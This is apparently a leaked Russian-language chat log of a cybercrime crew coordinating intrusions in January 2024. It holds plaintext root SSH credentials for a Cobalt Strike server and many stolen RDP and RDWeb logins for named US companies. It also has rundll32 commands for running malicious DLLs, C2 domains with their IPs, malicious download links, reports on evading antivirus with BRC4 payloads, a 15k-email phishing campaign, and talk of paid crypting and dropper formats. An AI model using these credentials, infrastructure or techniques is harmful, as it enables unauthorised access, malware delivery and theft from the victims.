[2024-01-25 13:31:47] @usernamegg:matrix.bestflowers247.online: stage payload отключены

--------------------
[2024-01-25 13:32:45] @usernameyy:matrix.bestflowers247.online: это на каком сервере
--------------------
[2024-01-25 13:32:53] @usernamegg:matrix.bestflowers247.online: yy: профиль сделал прогер с другой команды
--------------------
[2024-01-25 13:33:22] @usernamegg:matrix.bestflowers247.online: доступ к серверу надо
--------------------
[2024-01-25 13:34:46] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 13:37:47] @usernamezz:matrix.bestflowers247.online: DE_443x64_thread.bin
--------------------
[2024-01-25 13:43:54] @u123:matrix.bestflowers247.online: мин
--------------------
[2024-01-25 13:45:21] @u123:matrix.bestflowers247.online: root@193.124.22.200
6tUASZx6ukyizhgtxhzjCxczx
--------------------
[2024-01-25 13:45:26] @u123:matrix.bestflowers247.online: порт 22
--------------------
[2024-01-25 13:46:26] @muaddib6:matrix.org: забрал
--------------------
[2024-01-25 13:48:03] @usernamegg:matrix.bestflowers247.online: root@193.124.22.200
6tUASZx6ukyizhgtxhzjCxczx
--------------------
[2024-01-25 13:48:12] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> это на каком сервере

порт 22
--------------------
[2024-01-25 13:48:45] @usernameyy:matrix.bestflowers247.online: пофиксить это в профиле надо?
--------------------
[2024-01-25 13:48:51] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-25 13:48:54] @usernamegg:matrix.bestflowers247.online: они уже его сделали
--------------------
[2024-01-25 13:48:56] @usernamegg:matrix.bestflowers247.online: посмотри
--------------------
[2024-01-25 13:49:06] @usernamegg:matrix.bestflowers247.online: и если все ок как основной будем использовать
--------------------
[2024-01-25 13:49:24] @usernamegg:matrix.bestflowers247.online: скрипт который кобы накатывает на сервак надо будет его туда залить и обновить
--------------------
[2024-01-25 13:49:42] @muaddib6:matrix.org: > <@usernamezz:matrix.bestflowers247.online> sent a file.

а это что за файл? тоже .bin ?
--------------------
[2024-01-25 13:50:05] @usernameyy:matrix.bestflowers247.online: путь до кобы какой? в руте нет ее
--------------------
[2024-01-25 13:52:42] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 13:53:03] @usernamegg:matrix.bestflowers247.online: путь до кобы какой? в руте нет ее
--------------------
[2024-01-25 13:53:10] @muaddib6:matrix.org: +
--------------------
[2024-01-25 13:53:14] @muaddib6:matrix.org: ок
--------------------
[2024-01-25 13:53:16] @usernamegg:matrix.bestflowers247.online: куда он все залил на серваке
--------------------
[2024-01-25 13:53:18] @usernamegg:matrix.bestflowers247.online: не могу найти
--------------------
[2024-01-25 14:04:57] @usernameyy:matrix.bestflowers247.online: в папке /opt
--------------------
[2024-01-25 14:05:47] @usernameyy:matrix.bestflowers247.online: ну конфиг другой да, надо затестить запустить, ставлю этот профиль под установки сейчас?
--------------------
[2024-01-25 14:07:59] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 14:08:08] @usernamegg:matrix.bestflowers247.online: хороший профиль
--------------------
[2024-01-25 14:08:10] @usernamegg:matrix.bestflowers247.online: там чел шарит
--------------------
[2024-01-25 14:08:22] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 14:08:34] @usernameyy:matrix.bestflowers247.online: так, а рандомить его или прям так захардкодить?
--------------------
[2024-01-25 14:08:39] @usernameyy:matrix.bestflowers247.online: он палится вообще? не проверяли?
--------------------
[2024-01-25 14:08:56] @usernamegg:matrix.bestflowers247.online: нет еще не проверяли ничего
--------------------
[2024-01-25 14:09:15] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> так, а рандомить его или прям так захардкодить?

а как ты его рандомить хочешь ?
--------------------
[2024-01-25 14:09:24] @usernameyy:matrix.bestflowers247.online: у нас сейчас профили генеренки
--------------------
[2024-01-25 14:09:29] @usernameyy:matrix.bestflowers247.online: типа каждый пункт там рандомный
--------------------
[2024-01-25 14:09:49] @usernameyy:matrix.bestflowers247.online: для теста можем просто профиль заменить на любой установке
--------------------
[2024-01-25 14:09:52] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2024-01-25 14:09:59] @usernamegg:matrix.bestflowers247.online: так, а рандомить его или прям так захардкодить?
он палится вообще? не проверяли?
--------------------
[2024-01-25 14:10:07] @usernamegg:matrix.bestflowers247.online: прогера спрошу
--------------------
[2024-01-25 14:10:09] @usernamegg:matrix.bestflowers247.online: он отшел
--------------------
[2024-01-25 14:10:12] @usernamegg:matrix.bestflowers247.online: рандомит его или нет
--------------------
[2024-01-25 14:24:01] @usernamegg:matrix.bestflowers247.online: https://www.zoominfo.com/c/arteris-inc/350884310  Domain
RDP  Eset


https://www.zoominfo.com/c/simulations-plus-inc/46334533   domain
trendmicro    RDP
--------------------
[2024-01-25 14:36:08] @usernamegg:matrix.bestflowers247.online: ```
66.210.115.58:13389@AQUIDNECK\presentation;Pa55word;United States;Providence;Rhode Island;Good;No;2024;21.01.24;


24.97.190.39:63389@CALLACCT1234\fastwind;Klark120;United States;Syracuse;New York;Good;Yes;Win7;11.01.24;
```

--------------------
[2024-01-25 14:41:40] @usernamegg:matrix.bestflowers247.online: `20.82.100.238:3389@VMW-CLIENT-W7-0\admin_tmb;P@ssw0rd2022!;United States; ; ;Good;Yes;Win7;14.01.24;`
--------------------
[2024-01-25 14:44:40] @muaddib6:matrix.org: > <@usernamezz:matrix.bestflowers247.online> sent a file.

Готово rundll32 file.dll, DllGetClassObject
--------------------
[2024-01-25 14:44:54] @muaddib6:matrix.org: 2.7z
--------------------
[2024-01-25 14:44:59] @muaddib6:matrix.org: > <@usernamezz:matrix.bestflowers247.online> sent a file.

Готово. rundll32 file.dll, DllGetClassObject
--------------------
[2024-01-25 14:45:10] @muaddib6:matrix.org: 3.7z
--------------------
[2024-01-25 14:46:52] @usernamegg:matrix.bestflowers247.online: `24.248.225.126:3389@GRANITESERVER\print;Passw0rd!;United States;Wichita;Kansas;Good;No;Win10;14.01.24;  по первому`
--------------------
[2024-01-25 14:47:06] @usernamegg:matrix.bestflowers247.online: второй самый первы конннектит
--------------------
[2024-01-25 14:48:37] @cob_crypt_ward:matrix.bestflowers247.online: https://scanner.to/result_EDR/QiWdSupYjHMC
--------------------
[2024-01-25 14:48:44] @cob_crypt_ward:matrix.bestflowers247.online: последний результат, которого добился
--------------------
[2024-01-25 14:48:47] @cob_crypt_ward:matrix.bestflowers247.online: с BRC4\
--------------------
[2024-01-25 14:48:52] @cob_crypt_ward:matrix.bestflowers247.online: * с BRC4 в dll
--------------------
[2024-01-25 14:49:02] @cob_crypt_ward:matrix.bestflowers247.online: trendmicro тоже чистый
--------------------
[2024-01-25 14:49:18] @cob_crypt_ward:matrix.bestflowers247.online: > <@cob_crypt_ward:matrix.bestflowers247.online> с BRC4 в dll

в exe кровда нету
--------------------
[2024-01-25 14:51:00] @usernamezz:matrix.bestflowers247.online: `http://temp.sh/CLvFT/1.jpg`
--------------------
[2024-01-25 14:58:00] @u123:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> путь до кобы какой? в руте нет ее

сейчас уточню
--------------------
[2024-01-25 14:59:34] @u123:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> так, а рандомить его или прям так захардкодить?
> он палится вообще? не проверяли?

не понял о чем ты. шел чистый с артифактом и urdl
--------------------
[2024-01-25 15:13:17] @lapa:matrix.bestflowers247.online: скоро проверю и запущусь
--------------------
[2024-01-25 15:19:54] @lapa:matrix.bestflowers247.online: запустился
--------------------
[2024-01-25 15:23:44] @usernamegg:matrix.bestflowers247.online: нашел уже
--------------------
[2024-01-25 15:24:35] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 15:24:50] @usernamegg:matrix.bestflowers247.online: есть запуски ?
--------------------
[2024-01-25 15:26:11] @lapa:matrix.bestflowers247.online: нет
--------------------
[2024-01-25 15:26:30] @lapa:matrix.bestflowers247.online: ждем
--------------------
[2024-01-25 15:26:32] @lapa:matrix.bestflowers247.online: я только запустился
--------------------
[2024-01-25 15:28:39] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 15:29:54] @u123:matrix.bestflowers247.online: #/opt/cobaltstrike3/
--------------------
[2024-01-25 15:29:56] @u123:matrix.bestflowers247.online: jr
--------------------
[2024-01-25 15:29:58] @u123:matrix.bestflowers247.online: ok
--------------------
[2024-01-25 15:30:04] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 15:30:06] @usernamegg:matrix.bestflowers247.online: я нашел
--------------------
[2024-01-25 15:30:10] @usernamegg:matrix.bestflowers247.online: спроси по счет генерации
--------------------
[2024-01-25 15:30:22] @usernamegg:matrix.bestflowers247.online: рандомить мне или ?
--------------------
[2024-01-25 15:30:37] @lapa:matrix.bestflowers247.online: один запуск есть
--------------------
[2024-01-25 15:30:54] @u123:matrix.bestflowers247.online: спросил
--------------------
[2024-01-25 15:31:03] @u123:matrix.bestflowers247.online: но думаю он уже зарандомлен
--------------------
[2024-01-25 15:31:06] @lapa:matrix.bestflowers247.online: но чет мне кажется это реверс
--------------------
[2024-01-25 15:31:07] @u123:matrix.bestflowers247.online: мин ответит
--------------------
[2024-01-25 15:32:12] @usernamegg:matrix.bestflowers247.online: не
--------------------
[2024-01-25 15:34:57] @u123:matrix.bestflowers247.online: что подразумеваешь под рандомить?
профиль там сгенерирован если что
--------------------
[2024-01-25 15:35:15] @u123:matrix.bestflowers247.online: профиль, серт и т.д. короче все как у нас засетаплено
--------------------
[2024-01-25 15:38:24] @lapa:matrix.bestflowers247.online: ну вот 40 скачиваний есть с юсы, но опять же, наверное реверсы
--------------------
[2024-01-25 15:42:23] @usernamegg:matrix.bestflowers247.online: ладно
--------------------
[2024-01-25 15:42:25] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2024-01-25 15:42:28] @usernamegg:matrix.bestflowers247.online: спасибо огромное
--------------------
[2024-01-25 15:42:34] @usernamegg:matrix.bestflowers247.online: профиль другой
--------------------
[2024-01-25 15:43:07] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2024-01-25 15:43:20] @usernamegg:matrix.bestflowers247.online: в панель пока ни кто не пришел
--------------------
[2024-01-25 15:50:12] @lapa:matrix.bestflowers247.online: вот мы шлем на рр
--------------------
[2024-01-25 15:50:18] @lapa:matrix.bestflowers247.online: они из юк
--------------------
[2024-01-25 15:50:22] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2024-01-25 15:50:24] @lapa:matrix.bestflowers247.online: с юк есть пару скачиваний
--------------------
[2024-01-25 15:50:27] @lapa:matrix.bestflowers247.online: но запусков нет
--------------------
[2024-01-25 15:50:33] @usernamegg:matrix.bestflowers247.online: хм
--------------------
[2024-01-25 15:51:19] @u123:matrix.bestflowers247.online: пжлста
--------------------
[2024-01-25 15:51:25] @lapa:matrix.bestflowers247.online: да у таких китов запросто может быть такое, что msi js и подомное не запустить
--------------------
[2024-01-25 15:51:43] @u123:matrix.bestflowers247.online: пиши если надо будет еще
--------------------
[2024-01-25 15:51:45] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 15:51:51] @usernamegg:matrix.bestflowers247.online: что бы их пробить нужно что уникальное
--------------------
[2024-01-25 15:52:16] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 15:53:15] @usernamegg:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> root@193.124.22.200
> 6tUASZx6ukyizhgtxhzjCxczx

#/opt/cobaltstrike3/

--------------------
[2024-01-25 16:00:26] @lapa:matrix.bestflowers247.online: ну короч ушли письма, которые хотели отправить
--------------------
[2024-01-25 16:00:30] @lapa:matrix.bestflowers247.online: 15к+
--------------------
[2024-01-25 16:02:18] @lapa:matrix.bestflowers247.online: могу 10к на крупные прослать, но на которые проще доставить
--------------------
[2024-01-25 16:05:07] @lapa:matrix.bestflowers247.online: хотя ладно, дан будет злиться
--------------------
[2024-01-25 16:12:05] @usernamegg:matrix.bestflowers247.online: дан меня порвет
--------------------
[2024-01-25 16:12:13] @usernamegg:matrix.bestflowers247.online: и скажет больше не дам вам под точку ничего
--------------------
[2024-01-25 16:13:11] @usernamegg:matrix.bestflowers247.online: он просто там переживает очень
--------------------
[2024-01-25 16:13:16] @usernamegg:matrix.bestflowers247.online: не хочет пока под масс ничего слать
--------------------
[2024-01-25 16:13:23] @usernamegg:matrix.bestflowers247.online: клоаку всю свою перенатроил
--------------------
[2024-01-25 16:13:28] @usernamegg:matrix.bestflowers247.online: сколько запусков ?
--------------------
[2024-01-25 16:14:02] @lapa:matrix.bestflowers247.online: там 6 запусков, но это реверсы
--------------------
[2024-01-25 16:14:18] @lapa:matrix.bestflowers247.online: потому, что с этих айпишников скачивания не было
--------------------
[2024-01-25 16:14:27] @lapa:matrix.bestflowers247.online: короч нет чистых запусков
--------------------
[2024-01-25 16:14:53] @lapa:matrix.bestflowers247.online: меня смущает, что с юк 4 скачивания есть
--------------------
[2024-01-25 16:15:25] @usernamegg:matrix.bestflowers247.online: а запусков нет
--------------------
[2024-01-25 16:15:26] @lapa:matrix.bestflowers247.online: просто с них реверсы обычно не ходят
--------------------
[2024-01-25 16:15:27] @usernamegg:matrix.bestflowers247.online: я понял
--------------------
[2024-01-25 16:15:30] @lapa:matrix.bestflowers247.online: да, но запусков нет
--------------------
[2024-01-25 16:15:38] @lapa:matrix.bestflowers247.online: чет думаю это могут с рр скачивать
--------------------
[2024-01-25 16:15:54] @lapa:matrix.bestflowers247.online: но видимо запустить не могут
--------------------
[2024-01-25 16:16:34] @usernamegg:matrix.bestflowers247.online: ку
--------------------
[2024-01-25 16:16:35] @usernamegg:matrix.bestflowers247.online: зашел
--------------------
[2024-01-25 16:16:38] @usernamegg:matrix.bestflowers247.online: как получилось ?
--------------------
[2024-01-25 16:23:57] @sunortla:matrix.bestflowers247.online: +
--------------------
[2024-01-25 16:24:11] @sunortla:matrix.bestflowers247.online: Купил Vds
--------------------
[2024-01-25 16:24:32] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 16:24:59] @sunortla:matrix.bestflowers247.online: Купил молдову, а получил рашку, треш
--------------------
[2024-01-25 16:25:13] @usernamegg:matrix.bestflowers247.online: что за хостинг ?
--------------------
[2024-01-25 16:25:24] @sunortla:matrix.bestflowers247.online: https://bill.alexhost.com/
--------------------
[2024-01-25 16:25:27] @usernamegg:matrix.bestflowers247.online: ну что по цене ?
--------------------
[2024-01-25 16:25:32] @sunortla:matrix.bestflowers247.online: 10$
--------------------
[2024-01-25 16:25:40] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-25 16:25:42] @usernamegg:matrix.bestflowers247.online: я про цену твоего крипта
--------------------
[2024-01-25 16:26:11] @sunortla:matrix.bestflowers247.online: У меня инфецирование)
--------------------
[2024-01-25 16:26:18] @usernamegg:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/gee-group-co/46567153
https://rs.mangiainc.com/RDWeb/Pages/en-US/login.aspx:mangiainc\mfahimi:MF0131!!

https://www.zoominfo.com/c/harte-hanks/31394759
https://rds.ssgweb.com.ar/RDWeb/Pages/en-US/login.aspx:SSGWEB\ALT_Martin:cIBm*355338

https://www.zoominfo.com/c/agilethought-llc/2132737
https://ews2019test.ewsgroup.com/RDWeb/Pages/en-US/login.aspx:arrivy1@ewsgroup.com:@rr1vy@1

https://www.zoominfo.com/c/spok-inc/359821044
104.42.119.193:3389@MANHOLE\carlos;Welcome123

https://www.zoominfo.com/c/capitol-federal/6701468
34.128.64.65:3389@USSI-APP-SERVER\ussi;ussi;United States;Houston;Texas;Opened;No;2022;10.01.24;

https://www.zoominfo.com/c/silverback-mdm/347945745
75.149.35.141:3389@ZGO-HACFLRES\backoffice;backoffice;United States; ; ;Opened;Yes;Win10;21.01.24;

https://www.zoominfo.com/c/iteris-inc/59901406
69.165.78.54:3389@kQQiVF1696147\administrator;abcd1234;United States;Cheyenne;Wyoming;Good;Yes;2023;19.12.23;

https://www.zoominfo.com/c/cass-information-systems-inc/20812710

144.91.65.63:3389@SERVER2020\Printec;printec1234;United States;Oakland;California;Good;No;2024;09.01.24;
```



--------------------
[2024-01-25 16:26:19] @sunortla:matrix.bestflowers247.online: А у того товарища крипт)
--------------------
[2024-01-25 16:26:32] @sunortla:matrix.bestflowers247.online: 300$ файл
--------------------
[2024-01-25 16:27:03] @sunortla:matrix.bestflowers247.online: Кстати общение сдесь не безопасное
--------------------
[2024-01-25 16:27:07] @usernamegg:matrix.bestflowers247.online: да да
--------------------
[2024-01-25 16:27:13] @sunortla:matrix.bestflowers247.online: Лучше qtox
--------------------
[2024-01-25 16:27:18] @usernamegg:matrix.bestflowers247.online: у нас шифрованное оно
--------------------
[2024-01-25 16:27:24] @usernamegg:matrix.bestflowers247.online: на своем сервере считай стоит он
--------------------
[2024-01-25 16:27:32] @usernamegg:matrix.bestflowers247.online: qTox нет
--------------------
[2024-01-25 16:27:34] @sunortla:matrix.bestflowers247.online: Только Ip в открытую идут
--------------------
[2024-01-25 16:27:36] @usernamegg:matrix.bestflowers247.online: он не безопасен
--------------------
[2024-01-25 16:27:41] @usernamegg:matrix.bestflowers247.online: мы всей тимой тут сидим
--------------------
[2024-01-25 16:27:50] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-01-25 16:27:53] @usernamegg:matrix.bestflowers247.online: 300$
--------------------
[2024-01-25 16:27:57] @usernamegg:matrix.bestflowers247.online: пока так
--------------------
[2024-01-25 16:28:00] @usernamegg:matrix.bestflowers247.online: потом счет выставишь
--------------------
[2024-01-25 16:28:03] @usernamegg:matrix.bestflowers247.online: добавлю тебя в группу
--------------------
[2024-01-25 16:28:10] @sunortla:matrix.bestflowers247.online: Ну 1 файл считай сделал
--------------------
[2024-01-25 16:28:22] @sunortla:matrix.bestflowers247.online: Я пока хочу поглядеть
--------------------
[2024-01-25 16:28:38] @sunortla:matrix.bestflowers247.online: За тем псевдо инфикатором)
--------------------
[2024-01-25 16:30:01] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 16:30:04] @usernamegg:matrix.bestflowers247.online: его тоже будем считать
--------------------
[2024-01-25 16:30:20] @sunortla:matrix.bestflowers247.online: Ты инфикатору ничего не говорил?
--------------------
[2024-01-25 16:30:33] @sunortla:matrix.bestflowers247.online: Я думаю он уже на очке сидит
--------------------
[2024-01-25 16:32:11] @usernamegg:matrix.bestflowers247.online: нет
--------------------
[2024-01-25 16:32:24] @usernameww:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/harte-hanks/31394759
https://rds.ssgweb.com.ar/RDWeb/Pages/en-US/login.aspx:SSGWEB\ALT_Martin:cIBm*355338
креды не верны
```
--------------------
[2024-01-25 16:32:25] @usernamegg:matrix.bestflowers247.online: я никому ничего не говрил
--------------------
[2024-01-25 16:32:27] @usernamegg:matrix.bestflowers247.online: просто добавил тебя
--------------------
[2024-01-25 16:32:59] @usernamegg:matrix.bestflowers247.online: > <@usernamezz:matrix.bestflowers247.online> 03DNS_64

rundll32.exe dll.dll,LocalSetFile
--------------------
[2024-01-25 16:33:06] @usernamegg:matrix.bestflowers247.online: 04DNS_64.7z
--------------------
[2024-01-25 16:33:11] @usernamemm:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/iteris-inc/59901406
69.165.78.54:3389@kQQiVF1696147\administrator;abcd1234;United States;Cheyenne;Wyoming;Good;Yes;2023;19.12.23;
не заходит
```
--------------------
[2024-01-25 16:33:16] @usernamenn:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/agilethought-llc/2132737
https://ews2019test.ewsgroup.com/RDWeb/Pages/en-US/login.aspx:arrivy1@ewsgroup.com:@rr1vy@1
```
--------------------
[2024-01-25 16:33:25] @usernamezz:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/capitol-federal/6701468
34.128.64.65:3389@USSI-APP-SERVER\ussi;ussi;United States;Houston;Texas;Opened;No;2022;10.01.24;
нет коннекта
```
--------------------
[2024-01-25 16:33:27] @sunortla:matrix.bestflowers247.online: Ты решил уже файлы скинуть?)
--------------------
[2024-01-25 16:33:56] @usernamejj:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/cass-information-systems-inc/20812710
144.91.65.63:3389@SERVER2020\Printec;printec1234;United States;Oakland;California;Good;No;2024;09.01.24;

не заходит
```
--------------------
[2024-01-25 16:34:31] @usernamett:matrix.bestflowers247.online: ```
https://www.zoominfo.com/c/silverback-mdm/347945745
75.149.35.141:3389@ZGO-HACFLRES\backoffice;backoffice;United States; ; ;Opened;Yes;Win10;21.01.24;

нет коннекта
```

--------------------
[2024-01-25 16:34:41] @usernamegg:matrix.bestflowers247.online: ты делал вроде его уже
--------------------
[2024-01-25 16:34:45] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 16:34:48] @sunortla:matrix.bestflowers247.online: Тут кстати нет shellcode
--------------------
[2024-01-25 16:34:50] @usernamegg:matrix.bestflowers247.online: лучше новые жди файлы
--------------------
[2024-01-25 16:34:54] @usernamegg:matrix.bestflowers247.online: которые скинут ребятки у меня
--------------------
[2024-01-25 16:35:08] @sunortla:matrix.bestflowers247.online: Да shellcode x64 пойдут
--------------------
[2024-01-25 16:35:16] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 16:35:27] @sunortla:matrix.bestflowers247.online: А сколько уже беня работает так?
--------------------
[2024-01-25 16:35:42] @usernamegg:matrix.bestflowers247.online: со мной ?
--------------------
[2024-01-25 16:35:46] @usernamegg:matrix.bestflowers247.online: пару лет работает
--------------------
[2024-01-25 16:36:13] @sunortla:matrix.bestflowers247.online: Со мной 3
--------------------
[2024-01-25 16:36:17] @sunortla:matrix.bestflowers247.online: Но уже все
--------------------
[2024-01-25 16:47:12] @usernamegg:matrix.bestflowers247.online: на завтра попрошу сделать
--------------------
[2024-01-25 16:47:14] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-25 в 19.46.38.png
--------------------
[2024-01-25 16:47:27] @lapa:matrix.bestflowers247.online: 149.18.24.161 вот чистый запуск был
--------------------
[2024-01-25 16:47:58] @lapa:matrix.bestflowers247.online: было скачивание msi и запуск с этого айпишника
--------------------
[2024-01-25 16:48:08] @usernamegg:matrix.bestflowers247.online: оо
--------------------
[2024-01-25 16:48:14] @usernamegg:matrix.bestflowers247.online: 149.18.24.161 вот чистый запуск был
было скачивание msi и запуск с этого айпишника
--------------------
[2024-01-25 16:48:17] @usernamegg:matrix.bestflowers247.online: посмотри
--------------------
[2024-01-25 16:48:22] @usernamegg:matrix.bestflowers247.online: почему он не достучался
--------------------
[2024-01-25 16:48:24] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2024-01-25 16:48:32] @usernamegg:matrix.bestflowers247.online: ща дана пошевелю
--------------------
[2024-01-25 16:49:00] @usernamegg:matrix.bestflowers247.online: линки ему новые давай выдадим
--------------------
[2024-01-25 16:49:08] @usernamegg:matrix.bestflowers247.online: пускай сделает с путти сборку под италию
--------------------
[2024-01-25 16:49:56] @usernamegg:matrix.bestflowers247.online: 149.18.24.161
--------------------
[2024-01-25 16:50:05] @usernamess:matrix.bestflowers247.online: image.png
--------------------
[2024-01-25 16:50:14] @usernamess:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent an image.

https://www.zoominfo.com/c/spok-inc/359821044
104.42.119.193:3389@MANHOLE\carlos;Welcome123
--------------------
[2024-01-25 16:50:18] @usernamess:matrix.bestflowers247.online: https://www.zoominfo.com/c/gee-group-co/46567153
https://rs.mangiainc.com/RDWeb/Pages/en-US/login.aspx:mangiainc\mfahimi:MF0131!! Passwd incorrect
--------------------
[2024-01-25 16:50:44] @chuck:talks.icu: хм
--------------------
[2024-01-25 16:50:52] @chuck:talks.icu: ща лог гляну
--------------------
[2024-01-25 16:51:05] @lapa:matrix.bestflowers247.online: скоро подготовлю
--------------------
[2024-01-25 16:51:23] @usernamegg:matrix.bestflowers247.online: https://kitronits.com/4P6Hw2Q/{random}
https://unitedtechform.com/Eaql/{random}
https://trentform.com/pJx/{random}
--------------------
[2024-01-25 16:51:28] @usernamegg:matrix.bestflowers247.online: может на эти же пускай сделает
--------------------
[2024-01-25 16:51:29] @usernamegg:matrix.bestflowers247.online: или ?
--------------------
[2024-01-25 16:51:34] @usernamegg:matrix.bestflowers247.online: завтра уже грязные будут
--------------------
[2024-01-25 16:52:37] @chuck:talks.icu: хз, не было такого
--------------------
[2024-01-25 16:53:06] @lapa:matrix.bestflowers247.online: думаю будут грязные
--------------------
[2024-01-25 16:54:11] @usernamegg:matrix.bestflowers247.online: хм
ща лог гляну
хз, не было такого
--------------------
[2024-01-25 16:54:17] @usernamegg:matrix.bestflowers247.online: дан отписал м
--------------------
[2024-01-25 16:58:19] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 17:00:46] @lapa:matrix.bestflowers247.online: https://trendistech.com/mPy8/{random}
https://pixelprofiti.com/cpxMn7/{random}
https://pixeltechnical.com/V1x/{random}
--------------------
[2024-01-25 17:00:49] @lapa:matrix.bestflowers247.online: на завтра линки
--------------------
[2024-01-25 17:08:23] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-01-25 17:19:52] @usernamegg:matrix.bestflowers247.online: > <@usernameyy:matrix.bestflowers247.online> http://greenmotor.top
> http://stuffsteven.top

замена приехала
greenmotors.top
stuffstevenpeters.top

--------------------
[2024-01-25 17:20:09] @usernamegg:matrix.bestflowers247.online: сейчас добавлю их в панель и заработают
--------------------
[2024-01-25 17:21:30] @usernamegg:matrix.bestflowers247.online: 95.217.40.220 =   greenmotors.top
178.236.246.147 = stuffstevenpeters.top
--------------------
[2024-01-25 17:24:37] @usernamegg:matrix.bestflowers247.online: добавились
--------------------
[2024-01-25 17:24:39] @usernamegg:matrix.bestflowers247.online: привязывай
--------------------
[2024-01-25 17:24:41] @usernamegg:matrix.bestflowers247.online: проверяй
--------------------
[2024-01-25 17:24:44] @usernameyy:matrix.bestflowers247.online: щаща
--------------------
[2024-01-25 17:27:25] @usernamegg:matrix.bestflowers247.online: еще один дроппер с ехе этим соберем если что сейчас
--------------------
[2024-01-25 17:34:30] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 17:34:44] @usernameyy:matrix.bestflowers247.online: пока нет
--------------------
[2024-01-25 17:36:33] @usernamegg:matrix.bestflowers247.online: Снимок экрана 2024-01-25 в 20.35.41.png
--------------------
[2024-01-25 17:40:05] @lapa:matrix.bestflowers247.online: ясно, ну пусть js будет
--------------------
[2024-01-25 17:40:16] @usernamegg:matrix.bestflowers247.online: сейчас несколько соберет
--------------------
[2024-01-25 17:40:24] @lapa:matrix.bestflowers247.online: а ворд макрос старый как понимаю?
--------------------
[2024-01-25 17:40:33] @usernamegg:matrix.bestflowers247.online: не уточнял
--------------------
[2024-01-25 17:40:35] @usernamegg:matrix.bestflowers247.online: смотреть надо
--------------------
[2024-01-25 17:40:38] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-01-25 17:40:50] @lapa:matrix.bestflowers247.online: а, ну хотя там же поотрубали макросы
--------------------
[2024-01-25 17:42:42] @sunortla:matrix.bestflowers247.online: А shellcode обычно много?
--------------------
[2024-01-25 17:42:53] @sunortla:matrix.bestflowers247.online: Или они изредка бывают
--------------------
[2024-01-25 17:44:31] @lapa:matrix.bestflowers247.online: а lnk у него голый или в исо засунут?
--------------------
[2024-01-25 17:45:53] @usernamegg:matrix.bestflowers247.online: спросил
--------------------
[2024-01-25 17:46:12] @usernamegg:matrix.bestflowers247.online: когда таргеты пойдут много да
--------------------
[2024-01-25 17:46:21] @usernamegg:matrix.bestflowers247.online: пока тишина
--------------------
[2024-01-25 17:46:29] @usernamegg:matrix.bestflowers247.online: сосредоточены на добыче
--------------------
[2024-01-25 17:46:43] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> а lnk у него голый или в исо засунут?

[20:46:18] 2K24: в zip Но на гмаил например аттачем не пройдет
--------------------
[2024-01-25 17:46:48] @sunortla:matrix.bestflowers247.online: Это получается я буду потихоньку беню работы лишать?
--------------------
[2024-01-25 17:46:59] @lapa:matrix.bestflowers247.online: хм
--------------------
[2024-01-25 17:47:03] @sunortla:matrix.bestflowers247.online: Хотя у него много клиентов с другой стороны
--------------------
[2024-01-25 17:47:04] @usernamegg:matrix.bestflowers247.online: ну посмотрим
--------------------
[2024-01-25 17:47:04] @lapa:matrix.bestflowers247.online: ну пусть тоже lnk сделает
--------------------
[2024-01-25 17:47:09] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-01-25 17:47:12] @usernamegg:matrix.bestflowers247.online: есть у него клиенты
--------------------
[2024-01-25 17:47:18] @usernamegg:matrix.bestflowers247.online: но мы говорит самые большие у него
--------------------
[2024-01-25 17:47:25] @sunortla:matrix.bestflowers247.online: Он же по сути ничего не делает
--------------------
[2024-01-25 17:47:45] @usernamegg:matrix.bestflowers247.online: ну да
--------------------
[2024-01-25 17:47:47] @usernamegg:matrix.bestflowers247.online: я понял уже
--------------------
[2024-01-25 17:48:07] @sunortla:matrix.bestflowers247.online: Будет меньше работы для него, он начнет разлагаться
--------------------
[2024-01-25 17:48:20] @sunortla:matrix.bestflowers247.online: Его крипторы будут просить денег, а у него не будет
--------------------
[2024-01-25 17:48:25] @sunortla:matrix.bestflowers247.online: И они уйдут
--------------------
[2024-01-25 17:48:30] @sunortla:matrix.bestflowers247.online: А это дело времени
--------------------
[2024-01-25 17:48:33] @sunortla:matrix.bestflowers247.online: И все
--------------------
[2024-01-25 17:48:36] @usernamegg:matrix.bestflowers247.online: ++
--------------------
